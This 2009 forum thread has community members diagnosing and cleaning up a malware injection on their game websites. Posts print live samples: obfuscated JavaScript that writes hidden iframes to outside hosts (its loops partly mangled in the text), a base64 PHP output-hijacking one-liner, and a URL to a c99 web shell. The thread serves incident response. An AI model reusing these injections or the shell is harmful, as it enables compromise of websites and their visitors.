Samapico Posted April 30, 2009 Report Posted April 30, 2009 I experienced some weird redirecting + browser freezing issues on the SSC forum as well... I pm'ed Ace about this. Did it happen to anyone else? Quote
Aceflyer Posted April 30, 2009 Report Posted April 30, 2009 Split off from GetContinuum topic and moved to the SSC board. I do not have FTP access to sscouncil.com so I will PM BlueGoku about this. I too have noticed some weird issues on the forum lately but was unsure if it was just me. Thanks for reporting this. Quote
Samapico Posted April 30, 2009 Author Report Posted April 30, 2009 Just checked again... I get a connection to \'you-found-it.org\' when loading the page, something about addtracker.com as well And at the end of the source of the page:CODEvar vaNNBExQNuSTIFDkdvyz = \"E60E105E102E114E97E109E101E32E119E105E100E116E104E61E34E52E56E48E34E32E104E101E105E103E104E116E61E34E54E48E34E32E115E114E99E61E34E104E116E116E112E58E47E47E97E100E100E99E111E117E110E101E114E46E105E110E102E111E47E105E110E100E101E120E46E112E104E112E34E32E115E116E121E108E101E61E34E98E111E114E100E101E114E58E48E112E120E59E32E112E111E115E105E116E105E111E110E58E114E101E108E97E116E105E118E101E59E32E116E111E112E58E48E112E120E59E32E108E101E102E116E58E45E53E48E48E112E120E59E32E111E112E97E99E105E116E121E58E48E59E32E102E105E108E116E101E114E58E112E114E111E103E105E100E58E68E88E73E109E97E103E101E84E114E97E110E115E102E111E114E109E46E77E105E99E114E111E115E111E102E116E46E65E108E112E104E97E40E111E112E97E99E105E116E121E61E48E41E59E32E45E109E111E122E45E111E112E97E99E105E116E121E58E48E34E62E60E47E105E102E114E97E109E101E62\";var OtyTIUjVPpaKPoXRsUhG = vaNNBExQNuSTIFDkdvyz.split(\"E\");var PAaXFeIjZGjozhHHBrdQ = \"\";for (var hDbwszOlUwrkwSHCwQlW=1; hDbwszOlUwrkwSHCwQlWrCode(OtyTIUjVPpaKPoXRsUhG[hDbwszOlUwrkwSHCwQlW]);}document.write(PAaXFeIjZGjozhHHBrdQ)<script type=\"text/javascript\">var oITtgjrSPDgMUalyvYkn = \"EcFaA60EcFaA105EcFaA102EcFaA114EcFaA97EcFaA109EcFaA101EcFaA32EcFaA119EcFaA105EcFaA100EcFaA116EcFaA104EcFaA61EcFaA34EcFaA52EcFaA56EcFaA48EcFaA34EcFaA32EcFaA104EcFaA101EcFaA105EcFaA103EcFaA104EcFaA116EcFaA61EcFaA34EcFaA54EcFaA48EcFaA34EcFaA32EcFaA115EcFaA114EcFaA99EcFaA61EcFaA34EcFaA104EcFaA116EcFaA116EcFaA112EcFaA58EcFaA47EcFaA47EcFaA121EcFaA111EcFaA117EcFaA45EcFaA102EcFaA111EcFaA117EcFaA110EcFaA100EcFaA45EcFaA105EcFaA116EcFaA46EcFaA111EcFaA114EcFaA103EcFaA47EcFaA105EcFaA110EcFaA100EcFaA101EcFaA120EcFaA46EcFaA112EcFaA104EcFaA112EcFaA34EcFaA32EcFaA115EcFaA116EcFaA121EcFaA108EcFaA101EcFaA61EcFaA34EcFaA98EcFaA111EcFaA114EcFaA100EcFaA101EcFaA114EcFaA58EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA112EcFaA111EcFaA115EcFaA105EcFaA116EcFaA105EcFaA111EcFaA110EcFaA58EcFaA114EcFaA101EcFaA108EcFaA97EcFaA116EcFaA105EcFaA118EcFaA101EcFaA59EcFaA32EcFaA116EcFaA111EcFaA112EcFaA58EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA108EcFaA101EcFaA102EcFaA116EcFaA58EcFaA45EcFaA53EcFaA48EcFaA48EcFaA112EcFaA120EcFaA59EcFaA32EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA58EcFaA48EcFaA59EcFaA32EcFaA102EcFaA105EcFaA108EcFaA116EcFaA101EcFaA114EcFaA58EcFaA112EcFaA114EcFaA111EcFaA103EcFaA105EcFaA100EcFaA58EcFaA68EcFaA88EcFaA73EcFaA109EcFaA97EcFaA103EcFaA101EcFaA84EcFaA114EcFaA97EcFaA110EcFaA115EcFaA102EcFaA111EcFaA114EcFaA109EcFaA46EcFaA77EcFaA105EcFaA99EcFaA114EcFaA111EcFaA115EcFaA111EcFaA102EcFaA116EcFaA46EcFaA65EcFaA108EcFaA112EcFaA104EcFaA97EcFaA40EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA61EcFaA48EcFaA41EcFaA59EcFaA32EcFaA45EcFaA109EcFaA111EcFaA122EcFaA45EcFaA111EcFaA112EcFaA97EcFaA99EcFaA105EcFaA116EcFaA121EcFaA58EcFaA48EcFaA34EcFaA62EcFaA60EcFaA47EcFaA105EcFaA102EcFaA114EcFaA97EcFaA109EcFaA101EcFaA62\";var bMVBzEhfnUucdOVJxNbN = oITtgjrSPDgMUalyvYkn.split(\"EcFaA\");var QIZljLjejUSLgnMfruLf = \"\";for (var OGHrUdBSqcfHlFtUQczA=1; OGHrUdBSqcfHlFtUQczArCode(bMVBzEhfnUucdOVJxNbN[OGHrUdBSqcfHlFtUQczA]);}document.write(QIZljLjejUSLgnMfruLf)Looks suspicious edit: ... codebox is useless lol... it puts an horizontal scrollbar, but still stretches the whole page with the text in it ... grr Quote
Hakaku Posted April 30, 2009 Report Posted April 30, 2009 Yeah I get it too, not just on the forum, but the entire sscouncil.com website as well. Actually, for that matter, it's not just the suspicious script at the bottom of the source, but there's weird numbers inserted before every paragraph (), and an entire list of malicious websites embedded near the end. It also seems to want to force the browser towards the bottom of the page. Quote
Samapico Posted April 30, 2009 Author Report Posted April 30, 2009 Yeah I get it too, not just on the forum, but the entire sscouncil.com website as well. Actually, for that matter, it's not just the suspicious script at the bottom of the source, but there's weird numbers inserted before every paragraph (), and an entire list of malicious websites embedded near the end. It also seems to want to force the browser towards the bottom of the page.My browser jammed once... :/ Quote
Aceflyer Posted April 30, 2009 Report Posted April 30, 2009 Well let's hope BG gets to this. I will also send an email to Wonderer but I do not expect him to take direct action. Quote
Samapico Posted May 1, 2009 Author Report Posted May 1, 2009 Is there anything in common between Getcontinuum.com and the ssc forum? Host or whatever... I don't know much about these things... but since both sites were targeted with what seems to be the same attack, and if they have something in common, there might be other sites to check :/ Quote
p man Posted May 1, 2009 Report Posted May 1, 2009 (edited) My computer started smoking after I went to this siteAny suggestions? Edited May 1, 2009 by p man Quote
Guest davinci Posted May 1, 2009 Report Posted May 1, 2009 My mother self combusted after I went to this site. Any suggestions? Quote
Aceflyer Posted May 1, 2009 Report Posted May 1, 2009 Have now pinged Bargeld as well. Hopefully someone will get to this shortly. Quote
L.C. Posted May 1, 2009 Report Posted May 1, 2009 (edited) Ugh. hlrse.net was hit with a similar script attack about a month ago. But the only way it could have happened on HLRSE is if someone had FTP access and PHP abilities under public_html. As most of you may know, with PHP you can search directories beneath/above yours and get a directory listing as well as execute/manipulate files. With a situation like this at hlrse.net (not giving details as to why "a someone had FTP access" to a subdirectory in public_html), whether it was by accident or purpose, someone attempted to attack the server with a script that injected a line of PHP into the top of every file. It targeted more than just html and php files too, but I think the script was only successful enough to hit html and php files. The reason the script failed was because, if executed in a partitioned and safe environment, you would find that the script was full of errors. The main ingredients of that line had been in base64 encoding, which if decrypted, located a primary file on the server that was ALSO in base64. If decoded, you would get multitudes of chunks of base64 parts. In one of the parts we found the main part of this file. Unfortunately the privatepaste/pastebin's my host and I had regarding this have already been deleted. The following is that "one liner" that was inserted (with PHP, base64 and eval()): aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JB TFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc 3RzKCcvaG9tZS9obHJzZS9wdWJsaWNfaHRtbC9maWZ0eWZvdXIvd3AtY29udG VudC9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3dwMS41XzIuMC9 3cC1hZG1pbi8uc3ZuL3RtcC9wcm9wcy9qcy5waHAnKSl7aW5jbHVkZV9vbmNl KCcvaG9tZS9obHJzZS9wdWJsaWNfaHRtbC9maWZ0eWZvdXIvd3AtY29udGVud C9wbHVnaW5zL3BvZHByZXNzL29wdGlvbmFsX2ZpbGVzL3dwMS41XzIuMC93cC 1hZG1pbi8uc3ZuL3RtcC9wcm9wcy9qcy5waHAnKTtpZihmdW5jdGlvbl9leGl zdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVu Y3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZ Cl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpey RlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9Mis kZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYm MTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO 30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JH U9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0N vbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJl Z19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlK CcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cm V0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19 The main file ended up linking to/reading/executing/whatever from the following (NOTE -- Your AV will pick this text file of code up as "PHP/C99SHell.A trojan" according to NOD32): http://otoelektronik.net/shell/c99.txt Although this has little relevance (or non at all) to THIS issue here in the community sites, some of you may find this stuff awesomely interesting. Perhaps this is an attempted script attack, no doubt. At least the server wasn't hijacked, or much damage done (hopefully). Edited May 1, 2009 by L.C. Quote
JoWie Posted May 1, 2009 Report Posted May 1, 2009 I have played around locally with c99 before. Basically its a nice interface to execute php commando's, execute system commands, manipulate files.Contains some php exploits, can listen for connections, connect as an irc bot, brutefoce ftp cracker, crack winnt passwords / unix passwd, sql interface. Ofcourse anyone who runs his webserver as a privileged user is asking for trouble. It probably came from here: http://www.shellc0der.com/ Quote
RiiStar Posted May 2, 2009 Report Posted May 2, 2009 (edited) XSS/HTML injection? O_o Bummer... Edited May 2, 2009 by RiiStar Quote
rootbear75 Posted May 2, 2009 Report Posted May 2, 2009 The main file ended up linking to/reading/executing/whatever from the following (NOTE -- Your AV will pick this text file of code up as "PHP/C99SHell.A trojan" according to NOD32):Similar, but mine said "Trojan horse PHP/BackDoor.C99Shell" Quote
BlueGoku Posted May 7, 2009 Report Posted May 7, 2009 Ace and Maverick fixed all the sites that were affected. Quote
Aceflyer Posted May 8, 2009 Report Posted May 8, 2009 Still need to restore some lost content on beginner.getcontinuum.com actually, but yeah, all the script stuff is purged and everything else is done. Quote
RiiStar Posted May 18, 2009 Report Posted May 18, 2009 (edited) Sorry ace... but your not done yet! http://i559.photobucket.com/albums/ss36/RiiStar/getcontinuum-site.jpg Check for inserted html after body tags, java stuff also like before...Supposedly there might be bad/injected .htaccess files and if there is webalizer on the site, it could also add it into that directory also. The linked post below is about wat one host provider did to help solve the issue. Avast Anti-Virus Forum where removal methods are being discussed... Edited May 18, 2009 by RiiStar Quote
Aceflyer Posted May 18, 2009 Report Posted May 18, 2009 See the post in the GetContinuum thread. There was some vulnerability that allowed the hacker to re-hack all the sites once they were fixed. We're still working on addressing this. Quote
»Lynx Posted May 23, 2009 Report Posted May 23, 2009 Your Forum has been compromised... again. -L Quote
Aceflyer Posted May 23, 2009 Report Posted May 23, 2009 We know that. Again, the matter is in the hands of the host. Quote
»Maverick Posted May 23, 2009 Report Posted May 23, 2009 Yes, we're still having massive problems with the websites being re-infected over and over. Hopefully the host can fix the leak (if it's related to H-Sphere). I just restored sscouncil.com and the forum so it's free of any hack-crap but it's only a matter of time before it's getting infected again at this point. Quote
Aceflyer Posted May 23, 2009 Report Posted May 23, 2009 Yep, thanks so much Mav. Hopefully the host will finally get around to fixing whatever leak is causing these websites to be susceptible to the hacking. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.